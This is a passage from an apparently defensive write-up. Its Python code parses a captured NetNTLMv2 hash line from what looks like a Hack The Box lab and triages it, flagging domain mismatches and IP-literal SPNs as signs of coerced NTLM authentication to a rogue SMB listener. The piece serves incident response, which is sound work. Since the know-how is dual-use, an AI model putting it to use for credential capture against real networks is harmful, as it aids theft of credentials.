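            "timestamp": timestamp, "client_challenge": client_challenge,
            "target_info": target_info}


def triage(record):
    """Observations a responder wants from one capture: who, when, to what."""
    ti = record["target_info"]
    notes = [f"{record['domain']}\\{record['user']} authenticated at "
             f"{record['timestamp']:%Y-%m-%d %H:%M:%S} UTC"]
    claimed = ti.get("MsvAvNbDomainName", "")
    if claimed.upper() != record["domain"].upper():
        notes.append(f"challenge was issued by a host declaring domain '{claimed}', "
                     f"not the user's domain '{record['domain']}'")
    target = ti.get("MsvAvTargetName", "")
    host = target.split("/", 1)[1] if "/" in target else target
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        notes.append(f"client targeted an IP literal ({target}); such SPNs normally get "
                     "no Kerberos ticket, so the client fell back to NTLM")
    return notes


if __name__ == "__main__":
    rec = parse_netntlmv2(CAPTURED_LINE)
    for k, v in rec["target_info"].items():
        print(f"{k:22} {v}")
    print("\n".join(triage(rec)))
```

Decoded, the capture tells an investigator who authenticated (HTB\amanda), when (the FILETIME resolves to 2016-09-08 UTC) and to what (an IP-literal cifs SPN on a host whose declared domain does not match the user's), which together are the signature of a client coerced into NTLM authentication against an SMB listener that is not a domain member. On the defensive side, no legitimate server will hold a matching logon event for that moment, and the target address in the blob is where to look for the listener.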
